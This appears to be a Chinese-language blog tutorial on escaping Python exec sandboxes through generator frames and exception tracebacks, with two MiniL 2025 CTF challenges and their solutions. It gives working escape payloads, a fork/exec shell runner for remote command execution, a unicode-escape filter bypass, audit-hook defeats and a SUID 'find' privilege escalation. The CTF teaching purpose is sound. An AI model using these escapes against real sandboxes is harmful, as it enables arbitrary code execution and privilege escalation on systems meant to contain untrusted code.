LOADING

首次加载会比较慢,果咩~

请打开缓存,下次打开就会很快啦

Python沙箱逃逸

#python沙箱逃逸

#生成器栈帧逃逸

本节参考:

#生成器

  生成器(Generator)是 Python 中一种特殊的迭代器,它可以通过简单的函数和表达式来创建。生成器的主要特点是能够逐个产生值,并且在每次生成值后保留当前的状态,以便下次调用时可以继续生成值。这使得生成器非常适合处理大型数据集或需要延迟计算的情况。

在 Python 中,生成器可以通过两种方式创建:

  • 生成器函数:定义一个函数,使用 yield 关键字生成值,每次调用生成器函数时,生成器会暂停并返回一个值,下次调用时会从暂停的地方继续执行。

    def my_generator():
        yield 1
        yield 2
        yield 3
    
    gen = my_generator()
    print(next(gen)) # 第一次调用,输出 1
    print(next(gen)) # 第二次调用,输出 2
    print(next(gen)) # 第三次调用,输出 3
    
  • 生成器表达式:使用类似列表推导式的语法,但使用圆括号而不是方括号,可以用来创建生成器对象。生成器表达式会逐个生成值,而不是一次性生成整个序列,这样可以节省内存空间,特别是在处理大型数据集时非常有用。

    gen = (x*x for x in range(5))
    print(list(gen))  # 输出 [0, 1, 4, 9, 16]
    

#栈帧

  在 Python 中,栈帧(stack frame),也称为帧(frame),是用于执行代码的数据结构。每当 Python 解释器执行一个函数或方法时,都会创建一个新的栈帧,用于存储该函数或方法的局部变量、参数、返回地址以及其他执行相关的信息。这些栈帧会按照调用顺序被组织成一个栈,称为调用栈。

栈帧包含了以下几个重要的属性:
f_locals: 一个字典,包含了函数或方法的局部变量。键是变量名,值是变量的值。
f_globals: 一个字典,包含了函数或方法所在模块的全局变量。键是全局变量名,值是变量的值。
f_code: 一个代码对象(code object),包含了函数或方法的字节码指令、常量、变量名等信息。
f_lasti: 整数,表示最后执行的字节码指令的索引。
f_back: 指向上一级调用栈帧的引用,用于构建调用栈。

#生成器属性

gi_code: 生成器对应的code对象。
gi_frame: 生成器对应的frame(栈帧)对象。
gi_running: 生成器函数是否在执行。生成器函数在 yield 以后、执行 yield 的下一行代码前处于 frozen 状态,此时这个属性的值为0。
gi_yieldfrom:如果生成器正在从另一个生成器中 yield 值,则为该生成器对象的引用;否则为 None。
gi_frame.f_locals:一个字典,包含生成器当前帧的局部变量。

  着重介绍一下 gi_frame 属性。gi_frame 是一个与生成器(generator)相关的属性。它指向生成器当前执行的帧对象(frame object),如果这个生成器正在执行的话。帧对象表示代码执行的当前上下文,包含了局部变量、执行的字节码指令等信息。

def my_generator():
    yield 1
    yield 2
    yield 3

gen = my_generator()

# 获取生成器的当前帧信息
frame = gen.gi_frame

# 输出生成器的当前帧信息
print("Local Variables:", frame.f_locals)
print("Global Variables:", frame.f_globals)
print("Code Object:", frame.f_code)
print("Instruction Pointer:", frame.f_lasti)

同理利用gi_code属性也可以获得生成器的相关代码对象属性:

def my_generator():
    yield 1
    yield 2
    yield 3

gen = my_generator()

# 获取生成器的当前代码信息
code = gen.gi_code

# 输出生成器的当前代码信息
print(code.co_name)
print(code.co_code)
print(code.co_consts)
print(code.co_filename)

#利用生成器栈帧沙箱逃逸

  原理就是通过生成器的栈帧对象通过f_back(返回前一帧)从而逃逸出去获取globals全局符号表。观察下例,可以更好地理解什么是f_back:

def waff():
    def f():
        yield g.gi_frame.f_back  # 返回调用生成器g的栈帧(即waff函数的栈帧)

    g = f()  # 生成器
    frame = next(g)  # 获取调用生成器g的栈帧对象
    print(frame) # 打印调用生成器g的栈帧(即waff函数的栈帧)
    print(frame.f_back)  # 打印调用waff函数的栈帧(通常是模块级栈帧)
    print(frame.f_back.f_back) # 打印调用模块的栈帧(这里的模块实际指的就是整个环境,不会再有调用它的栈帧了,因为他就是栈帧堆底)
b = waff()
'''
<frame at 0x0000017F9003C7C0, file 'e:\\test_files\\Py\\box.py', line 7, code waff>
<frame at 0x0000017F903016C0, file 'e:\\test_files\\Py\\box.py', line 10, code <module>>
None
'''

如果把生成器的第一个元素改为g.gi_frame,会发生什么呢?示例如下:

def waff():
    def f():
      yield g.gi_frame

    g = f() 
    frame = next(g)
    print(frame) 
    print(frame.f_back)
waff()
'''
<frame at 0x000001FE0D2C1620, file 'e:\\test_files\\Py\\box.py', line 3, code f>
None
'''

神奇的事情发生了:根据我们之前的推断,这里的None不该出现,而应该指向全局环境才对,为什么会出现这个问题呢?

找来找去找了一圈没找到,问ai不懂,到最后得靠万能的群友(mantle神力!)找到了一个提问(本节参考的第二个url),根据回答,可以总结如下:

CPython 为了避免内存泄漏和引用循环设计了主动行为,源码如下:

/* Don't keep the reference to f_back any longer than necessary.  It
* may keep a chain of frames alive or it could create a reference
* cycle. */
assert(f->f_back == tstate->frame);
Py_CLEAR(f->f_back);

在生成器的帧对象挂起(即yield后到下次yield前的冻结状态)时,CPython 会主动清除其f_back引用,防止以下问题:

  • 引用循环:如果生成器的帧(g.gi_frame)通过 f_back 反向引用其调用者帧(如 waff 函数的帧),而调用者帧又直接或间接引用了生成器对象 g,会导致循环引用,无法被垃圾回收。
  • 内存泄漏:长时间保持对调用者帧的引用会阻止整个调用链上的帧被及时释放。

也就是说,生成器在挂起状态时,其f_back属性会被主动置None

那么之前的疑问代码流程就是以下模样:

  1. 全局环境调用waff()函数
  2. f()函数被定义
  3. 令g为f()函数,即将g定义为生成器
  4. 调用next(g),运行生成器至yield返回生成器本身的栈帧(可以直接返回),并在此时挂起
  5. 打印frame,即打印生成器本身的栈帧
  6. 尝试打印frame.f_back,由于生成器处于挂起状态,其f_back属性主动置None,这里打印None

这样的流程就合理了.同样,之前的符合原本预期的源码流程可以如下解释:

  1. 全局环境调用waff()函数
  2. f()函数被定义
  3. 令g为f()函数,即将g定义为生成器
  4. 调用next(g),运行生成器至yield,希望返回调用生成器g的栈帧对象,此时由于生成器的yield并未返回,也就是说生成器处于运行状态,这个f_back属性将如期返回waff的栈帧(可以在这里打印本栈帧的局部变量,可以确定为waff函数栈帧)
  5. 调用waff函数的栈帧对象是全局环境,此处正常打印
  6. 没有对象能调用全局环境,故frame.f_back.f_back为None

也是合情合理。

因此,在利用生成器栈帧逃逸时,一定要注意到生成器在挂起状态下是无法如预期地得到上一层调用栈帧的。需要在生成器运行时得到其上一栈帧。

再来一个较为典型的例子感受这个手法:

s3cret="this is flag"

codes='''
def waff():
    def f():
        yield g.gi_frame.f_back

    g = f()  #生成器
    frame = next(g) #获取到生成器的栈帧对象
    print(frame)
    print(frame.f_back)
    print(frame.f_back.f_back)
    b = frame.f_back.f_back.f_globals['s3cret'] #返回并获取前一级栈帧的globals
    return b
b=waff()
'''
locals={}
code = compile(codes, "test", "exec")
exec(code,locals)
print(locals["b"])
'''
<frame at 0x00000254A98ECE80, file 'test', line 8, code waff>
<frame at 0x00000254A9C21E40, file 'test', line 13, code <module>>
<frame at 0x00000254A9924BF0, file 'e:\\test_files\\Py\\box.py', line 19, code <module>>
this is flag
'''

对于以上代码,我们发现codes这些代码是在test这个沙盒中运行的,理论上是与全局变量隔离的,没办法从test这个局部环境中得到s3cret变量.然而codes中存在符合条件的生成器,这使得可以一层一层地回溯调用栈帧,直到回到全局环境(codesexec中被调用)

以上就是生成器栈帧逃逸地基本原理,来道题目感受一下

#Pyjail(MiniL 2025)

import socketserver
import sys
import ast
import io

with open(__file__, "r", encoding="utf-8") as f:
    source_code = f.read()

class SandboxVisitor(ast.NodeVisitor):
    def visit_Attribute(self, node):
        if isinstance(node.attr, str) and node.attr.startswith("__"):
            raise ValueError("Access to private attributes is not allowed")
        self.generic_visit(node)

def safe_exec(code: str, sandbox_globals=None):
    original_stdout = sys.stdout
    original_stderr = sys.stderr

    sys.stdout = io.StringIO()
    sys.stderr = io.StringIO()

    if sandbox_globals is None:
        sandbox_globals = {
            "__builtins__": {
                "print": print,
                "any": any,
                "len": len,
                "RuntimeError": RuntimeError,
                "addaudithook": sys.addaudithook,
                "original_stdout": original_stdout,
                "original_stderr": original_stderr
            }
        }

    try:
        tree = ast.parse(code)
        SandboxVisitor().visit(tree)

        exec(code, sandbox_globals)
        output = sys.stdout.getvalue()

        sys.stdout = original_stdout
        sys.stderr = original_stderr

        return output, sandbox_globals
    except Exception as e:
        sys.stdout = original_stdout
        sys.stderr = original_stderr
        return f"Error: {str(e)}", sandbox_globals


CODE = """
def my_audit_checker(event, args):
    blocked_events = [
        "import", "time.sleep", "builtins.input", "builtins.input/result", "open", "os.system",
         "eval","subprocess.Popen", "subprocess.call", "subprocess.run", "subprocess.check_output"
    ]
    if event in blocked_events or event.startswith("subprocess."):
        raise RuntimeError(f"Operation not allowed: {event}")

addaudithook(my_audit_checker)

"""


class Handler(socketserver.BaseRequestHandler):
    def handle(self):
        self.request.sendall(b"Welcome to Interactive Pyjail!\n")
        self.request.sendall(b"Rules: No import / No sleep / No input\n\n")

        try:
            self.request.sendall(b"========= Server Source Code =========\n")
            self.request.sendall(source_code.encode() + b"\n")
            self.request.sendall(b"========= End of Source Code =========\n\n")
        except Exception as e:
            self.request.sendall(b"Failed to load source code.\n")
            self.request.sendall(str(e).encode() + b"\n")

        self.request.sendall(b"Type your code line by line. Type 'exit' to quit.\n\n")

        prefix_code = CODE
        sandbox_globals = None

        while True:
            self.request.sendall(b">>> ")
            try:
                user_input = self.request.recv(4096).decode().strip()
                if not user_input:
                    continue
                if user_input.lower() == "exit":
                    self.request.sendall(b"Bye!\n")
                    break
                if len(user_input) > 100:
                    self.request.sendall(b"Input too long (max 100 chars)!\n")
                    continue

                full_code = prefix_code + user_input + "\n"
                prefix_code = ""

                result, sandbox_globals = safe_exec(full_code, sandbox_globals)
                self.request.sendall(result.encode() + b"\n")
            except Exception as e:
                self.request.sendall(f"Error occurred: {str(e)}\n".encode())
                break


if __name__ == "__main__":
    HOST, PORT = "0.0.0.0", 5000
    with socketserver.ThreadingTCPServer((HOST, PORT), Handler) as server:
        print(f"Server listening on {HOST}:{PORT}")
        server.serve_forever()

  这里存在沙盒环境sandbox_globals,对于在沙盒中的函数进行限制并且通过ast检查来禁止访问以双下划线(__)开头的私有属性。但是在这里我们仍然可以通过自己造一个生成器来进行栈帧逃逸:

a = (a.gi_frame.f_back.f_back for i in [1])
a = [x for x in a][0]
# a最终即为safe_exec的栈帧, 此时的a.f_globals就是全局环境了。

接下来,因为import被禁用了,我们得看看全局环境下有啥可以利用的模块:

globals = a.f_globals
globals['SandboxVisitor'].visit_Attribute=lambda x,y:None # 这里将ast检查干掉,方便后续操作
print(globals["sys"].modules["os"]) # 由于源码导入了sys,这里可以确认sys的存在
'''
<module 'os' (frozen)>
'''
# 这样我们就能确认os存在并且可以拿来用了
os = globals["sys"].modules["os"]
sys = globals["sys"]
# 这里是不能直接用os.popen的。官方文档里有指出os.popen是靠subprocess.popen实现的
a = 'def run(cmd):\n'
a += '    r, w = os.pipe()\n'
a += '    pid = os.fork()\n'
a += '    if pid == 0:\n'
a += '        os.close(r)\n'
a += '        os.dup2(w, 1)\n'
a += '        os.dup2(w, 2)\n'
a += '        os.execlp("/bin/sh", "sh", "-c", cmd)\n'
a += '    else:\n'
a += '        os.close(w)\n'
a += '        output = b"".join(iter(lambda: os.read(r, 4096), b"")).decode()\n'
a += '        os.close(r)\n'
a += '        os.waitpid(pid, 0)\n'
a += '        return output\n'
# 以上函数改造自官方wp,下有解释

这样就构造出了一个可以执行命令并回显的函数(需要处理输入输出,否则输出在服务端而非客户端)。函数如下:

def run(cmd):
    r, w = os.pipe() 
    pid = os.fork()
    if pid == 0:
        os.close(r)
        os.dup2(w, 1)
        os.dup2(w, 2)
        os.execlp("/bin/sh", "sh", "-c", cmd)
    else:
        os.close(w)
        output = b"".join(iter(lambda: os.read(r, 4096), b"")).decode()
        os.close(r)
        os.waitpid(pid, 0)
        return output

让我们解释以下这个函数:

  • r, w = os.pipe():os.pipe()在内核中开辟了一块缓冲区,并返回两个文件描述符,一个用于读取管道(r),一个用于写入管道(w)。这两个文件描述符在父进程和子进程中都可以访问,从而实现了两个进程之间的连接
  • pid = os.fork():os.fork()创建子进程(该子进程是父进程的副本,在这里就是执行这个函数的进程)并返回pid。这之后,子进程与父进程会得到各自的pid,pid=0为子进程,pid>0为父进程
  • 子进程行为
    • os.close(r):关闭管道读端,因为子进程不需要读入数据
    • os.dup2(w, 1),os.dup2(w, 2):将子进程的标准输出(1)和标准错误(2)重定向至管道写端(之后就会通过管道以字节流形式传递给父进程)
    • os.execlp("/bin/sh", "sh", "-c", cmd)执行cmd命令,输出将写入管道.
  • 父进程行为:
    • os.close(w):关闭管道写端
    • output = b"".join(iter(lambda: os.read(r, 4096), b"")).decode():os.read读取管道中的数据(子进程写入的数据,每次读入最多4096字节),iter函数会不断调用 os.read(r, 4096),直到返回 b""(这代表着子进程不再写入数据,管道关闭)。
    • os.close(r):关闭管道读端,释放资源
    • os.waitpid(pid, 0):等待子进程结束
    • 最后返回输出,成功将子进程的输出传输到父进程,这样我们就能得到回显了。否则由于运行代码的是服务端,客户端是没办法得到回显的,通过子进程执行命令再由父进程取得输出来避免输出到服务端,而可以被我们拿到。

我们的函数还需要iter函数,运行这个字符串拼接的函数还得要exec,而这些都好拿到:

iter=globals["__builtins__"].iter
exec=globals["__builtins__"].exec
# 接着运行,就可以用这个函数来rce了
exec(a)
print(run("ls /"))

至此,已经达到了rce的目的,题目也就基本完结了(原题还有一点小活,不是问题)

#异常栈帧逃逸

本节参考:

#什么是回溯对象

  回溯对象代表一个异常的栈跟踪信息。当异常发生时会隐式地创建一个回溯对象。从py3.7之后,也可以显式地创建一个回溯对象了。

  对于隐式地创建的回溯对象,当查找异常处理器使得执行栈展开时,会在每个展开层级的当前回溯之前插入一个回溯对象。 当进入一个异常处理器时,程序将可以使用栈跟踪。它可作为sys.exc_info() 所返回的元组的第三项,以及所捕获异常的 __traceback__属性被获取。

#利用手法

直接给出一个例子:

def get_stack_frame_via_exception():
    try:
        raise Exception
    except Exception as e:
        tb = e.__traceback__
        while tb.tb_next:
            tb = tb.tb_next
        return tb.tb_frame

对一些关键代码做一些解释:

  • 首先直接抛出异常,触发except,将异常的回溯对象赋值给tb。
  • 通过tb_next来进行栈帧的遍历,直到下一栈帧为None,可以保证最后所在的栈帧是模块级栈帧(这里也可以先用tb_frame得到栈帧,再使用f_back来操作)
  • 最后返回tb_frame来获得栈帧,这样就成功逃逸了

#Pybox(MiniL 2025)

from flask import Flask, request, Response
import multiprocessing
import sys
import io
import ast

app = Flask(__name__)


class SandboxVisitor(ast.NodeVisitor):
    forbidden_attrs = {
        "__class__",
        "__dict__",
        "__bases__",
        "__mro__",
        "__subclasses__",
        "__globals__",
        "__code__",
        "__closure__",
        "__func__",
        "__self__",
        "__module__",
        "__import__",
        "__builtins__",
        "__base__"
    }

    def visit_Attribute(self, node):
        if isinstance(node.attr, str) and node.attr in self.forbidden_attrs:
            raise ValueError
        self.generic_visit(node)

    def visit_GeneratorExp(self, node):
        raise ValueError


def sandbox_executor(code, result_queue):
    safe_builtins = {
        "print": print,
        "filter": filter,
        "list": list,
        "len": len,
        "addaudithook": sys.addaudithook,
        "Exception": Exception
    }
    safe_globals = {"__builtins__": safe_builtins}
    sys.stdout = io.StringIO()
    sys.stderr = io.StringIO()
    try:
        exec(code, safe_globals)
        output = sys.stdout.getvalue()
        error = sys.stderr.getvalue()
        result_queue.put(("ok", output or error))
    except Exception as e:
        result_queue.put(("err", str(e)))


def safe_exec(code: str, timeout=1):
    code = code.encode().decode('unicode_escape')
    tree = ast.parse(code)
    SandboxVisitor().visit(tree)
    result_queue = multiprocessing.Queue()
    p = multiprocessing.Process(target=sandbox_executor, args=(code, result_queue))
    p.start()
    p.join(timeout=timeout)
    if p.is_alive():
        p.terminate()
        return "Timeout: code took too long to run."
    try:
        status, output = result_queue.get_nowait()
        return output if status == "ok" else f"Error: {output}"
    except:
        return "Error: no output from sandbox."


CODE = """
def my_audit_checker(event,args):
    allowed_events = ["import", "time.sleep", "builtins.input", "builtins.input/result"]
    if not list(filter(lambda x: event == x, allowed_events)):
        raise Exception
    if len(args) > 0:
        raise Exception
addaudithook(my_audit_checker)
print("{}")
"""
badchars = "\"'|&`+-*/()[]{}_."


@app.route('/')
def index():
    return open(__file__, 'r', encoding="utf8").read()


@app.route('/execute', methods=['POST'])
def execute():
    text = request.form['text']
    for char in badchars:
        if char in text:
            return Response("Error", status=400)
    output = safe_exec(CODE.format(text))
    if len(output) > 5:
        return Response("TooLong", status=400)
    return Response(output, status=200)


if __name__ == '__main__':
    app.run(host='0.0.0.0')

  开始会发现限制有点多,存在badchars直接把许多字符禁用了。但是审计一下safe_exec我们又能发现这个badchars其实只是唬人的,因为在运行我们的代码前会有一个unicode解码,我们只要将我们的代码编码一下上传就能绕过这个badchars了。

  然后是绕过沙盒里的审计钩子。这里可以直接重写len方法和list方法,使得他们固定返回指定的bool值就可以不管那两个判定。

  接下来就是如何逃逸的问题。这里我们可以发现,SandboxVisitor将生成器禁用了,也就没法利用生成器来逃逸了。这时就用上了异常栈帧逃逸。

  还需要注意到我们的代码是会被固定嵌入到print里的,这个好办,投机取巧一下就行,具体怎么做见后述。

整合一下上述思路,可以这么写payload:

")
list=lambda x:True
len=lambda x:False

try:
    raise Exception
except Exception as e:
    globals = e.__traceback__.tb_frame.f_back.f_globals
    globals['SandboxVisitor'].visit_Attribute=lambda x,y:None
    os = globals["sys"].modules["os"]
    os.system("mkdir static $$ ls / > static/a.txt")
    
print("
# 利用 ")...print(" 的形式来绕过print。

  由于存在输出长度的限制,我们需要输出内容到另一个文件来查看(这里也可以造一个static来存放)。发现根目录中存在疑似flag文件,但是cat不出来,查看权限发现是不可读的。考虑suid提权:find / -user root -perm -4000 -exec ls -ldb {} \;,可以发现find就有suid权限。那可以直接用了:find . -exec cat /m* \;。如此就解决这题了。